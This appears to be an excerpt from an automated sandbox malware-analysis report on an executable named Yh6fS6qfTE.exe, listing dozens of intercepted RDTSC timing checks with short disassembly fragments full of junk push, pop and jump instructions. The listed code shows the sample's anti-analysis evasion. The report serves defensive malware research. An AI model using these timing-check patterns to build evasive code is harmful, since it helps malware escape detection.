                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115AF7C second address: 115AF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115B54D second address: 115B553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115B80F second address: 115B813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115B813 second address: 115B817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115BD78 second address: 115BD95 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD09CB0C7E6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007FD09CB0C7E6h 0x00000013 jbe 00007FD09CB0C7E6h 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115BD95 second address: 115BDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FD09CF151BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115BDA2 second address: 115BDC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD09CB0C7F3h 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FD09CB0C7E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115BDC3 second address: 115BDCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115BDCD second address: 115BDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115BF27 second address: 115BF59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007FD09CF151BCh 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007FD09CF151C5h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115C0BD second address: 115C0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1161455 second address: 116145B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116145B second address: 1161492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD09CB0C7E6h 0x0000000a popad 0x0000000b push esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop esi 0x0000000f jmp 00007FD09CB0C7ECh 0x00000014 popad 0x00000015 je 00007FD09CB0C82Ah 0x0000001b pushad 0x0000001c jmp 00007FD09CB0C7F2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1161E79 second address: 1161E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1161E7D second address: 1161E83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1161E83 second address: 1161E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151BEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1161FD6 second address: 1161FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1161FF2 second address: 1161FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116215D second address: 1162162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1166C02 second address: 1166C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FD09CF151BAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1166C13 second address: 1166C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1166C19 second address: 1166C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1166C25 second address: 1166C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1166C2B second address: 1166C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1166D84 second address: 1166DBD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 jnc 00007FD09CB0C7FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 js 00007FD09CB0C7E6h 0x00000018 pop edi 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11672DB second address: 11672E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11672E1 second address: 11672E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1167868 second address: 116786C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11679BE second address: 11679C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD09CB0C7E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 110FBF8 second address: 110FC02 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CF151B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 110FC02 second address: 110FC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1167E0A second address: 1167E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1167E0E second address: 1167E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1166758 second address: 116675D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116675D second address: 1166769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1166769 second address: 116676F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116676F second address: 1166774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1166774 second address: 116677B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116C9D5 second address: 116C9E1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CB0C7E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116C9E1 second address: 116C9F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116C9F6 second address: 116CA1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FD09CB0C7E6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116B94B second address: 116B957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116B957 second address: 116B966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007FD09CB0C7ECh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112FD68 second address: 110F08C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FD09CF151C8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 xor dword ptr [ebp+122D244Dh], edx 0x00000016 call dword ptr [ebp+122D29B7h] 0x0000001c pushad 0x0000001d ja 00007FD09CF151C7h 0x00000023 jp 00007FD09CF151B8h 0x00000029 popad 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11303D2 second address: 1130413 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD09CB0C7E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FD09CB0C7ECh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007FD09CB0C7F5h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e jo 00007FD09CB0C7F0h 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113057B second address: 1130585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD09CF151B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116BD84 second address: 116BD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116BD88 second address: 116BD97 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD09CF151DCh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116BD97 second address: 116BD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116BEDC second address: 116BEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116C1AB second address: 116C1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116C453 second address: 116C469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 116C469 second address: 116C46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1171616 second address: 117162F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD09CF151BDh 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10DD209 second address: 10DD20F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10DD20F second address: 10DD21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jc 00007FD09CF151B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117507C second address: 1175082 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11775ED second address: 11775F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10DB595 second address: 10DB5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10DB5A1 second address: 10DB5A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1177185 second address: 11771AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7ECh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD09CB0C7F1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11771AC second address: 11771B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11771B0 second address: 11771C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FD09CB0C7E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1179EFF second address: 1179F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1179F05 second address: 1179F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD09CB0C7F4h 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FD09CB0C7EBh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117A31F second address: 117A336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FD09CF151B6h 0x0000000c popad 0x0000000d jng 00007FD09CF151BEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118014B second address: 1180160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jl 00007FD09CB0C7E8h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1180160 second address: 1180164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F1692 second address: 10F16A6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD09CB0C7EAh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F16A6 second address: 10F16AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F4D3 second address: 117F4D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F4D9 second address: 117F504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C8h 0x00000009 jmp 00007FD09CF151BFh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F504 second address: 117F50E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F50E second address: 117F514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F677 second address: 117F67B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F7E8 second address: 117F820 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD09CF151B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD09CF151C4h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD09CF151C1h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F820 second address: 117F826 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F826 second address: 117F82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F82C second address: 117F832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F832 second address: 117F836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F836 second address: 117F83A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117FCC3 second address: 117FCCD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD09CF151B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117FCCD second address: 117FCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117FCD6 second address: 117FCED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jbe 00007FD09CF151B6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FD09CF151B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117FCED second address: 117FCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117FCF1 second address: 117FD02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185BEF second address: 1185BF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185BF5 second address: 1185BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1184A8D second address: 1184AB6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CB0C7EAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD09CB0C7F9h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1184AB6 second address: 1184ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1184D7C second address: 1184D94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1184D94 second address: 1184DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C1h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118593D second address: 1185943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185943 second address: 1185949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
